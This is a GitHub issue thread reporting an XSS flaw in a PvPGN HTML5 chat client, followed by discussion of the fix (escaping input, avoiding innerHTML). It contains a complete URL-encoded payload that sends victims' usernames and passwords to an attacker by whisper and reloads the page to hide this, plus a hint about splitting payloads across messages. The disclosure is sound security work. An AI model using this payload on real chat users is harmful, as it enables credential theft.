This chat is not secure

[StarveTheEgo]

It does not filter various so-called 'url encoded' characters (read, for example, RFC 3986)
And actually, does not filter anything evil, this is just simple example of exploit:

For example, if this one will be sent to web chat users, they will send their login credentials to YOUR_NICK_NAME_HERE:

%3Cimg src=asfasf onerror=body.hidden=true;pvpgn.sendMsg([`/w`,`YOUR_NICK_NAME_HERE`,$D(`username`).value,$D(`password`).value].join(String.fromCharCode(32)));$D(`chatBox`).innerHTML=``;setTimeout(function(){location.reload()},1000);%3E

I suggest you to stop using this tool (since author is not active also) until next patches by author or someone.
Thanks for attention!

[reillychase]

Are you saying other chat users can do an XSS exploit which whispers the credentials to them? Or that the web developer could modify the source to steal credentials?

[StarveTheEgo]

Oh i thought you are not active (most of authors are for some reason...)
Sorry then, i might try to pull request

I mean users can do XSS exploit
Either to steal passwords (like in my example, just write it to someone via whisper, or just in channel), either to inject bitcoin-mining script

[reillychase]

I haven't been active on this in 2 years, it was just a fun project but I later took the website offline.

So if someone gets into a pvpgn chat channel with someone else who is using this client, they can XSS them by sending that message into chat? I think PvPGN limits the amount of characters in a message which would make it trickier to exploit but not impossible.

I love a good hack so I will have to set this up just to see it. Nice find. It makes sense though since the text coming from the user needs to be filtered before included into the html of the chat output on the website.

[StarveTheEgo]

So if someone gets into a pvpgn chat channel with someone else who is using this client, they can XSS them by sending that message into chat? I think PvPGN limits the amount of characters in a message which would make it trickier to exploit but not impossible.

Well, it worked and there is nothing to trick, i well tested it
Still, if some specific PvPGN will have some impossible limits - it can be tricky, yea.You just put things into global scope, part by part, message by message, - and then run that combination

[reillychase]

Any way I can DM you to ask a few questions?

[StarveTheEgo]

That example also reloads the page, just to make it lesser noticeable

[StarveTheEgo]

Well, i am old for these things, it was "PM" for me all the time
By "DM" i probably understand DiscordMessage, and ye, i got account there: 1789#0223

[reillychase]

To fix this, I think all "escapeHtml"s need to be changed to filter XSS in this file:

https://github.com/reillychase/pvpgn-html5-chat-client/blob/master/static/js/websockify/wspvpgn.js

[StarveTheEgo]

Exactly

[StarveTheEgo]

Sorry for spam here, i am not strong GitHub user yet

I would also suggest to avoid innerHTML usage and add new elements using node objects
This is probably not a good idea, but way better than innerHTML usage on untrusted data
Also it will not recreate entire DOM tree, like it does here:
$D("pvpgn").innerHTML = full_list;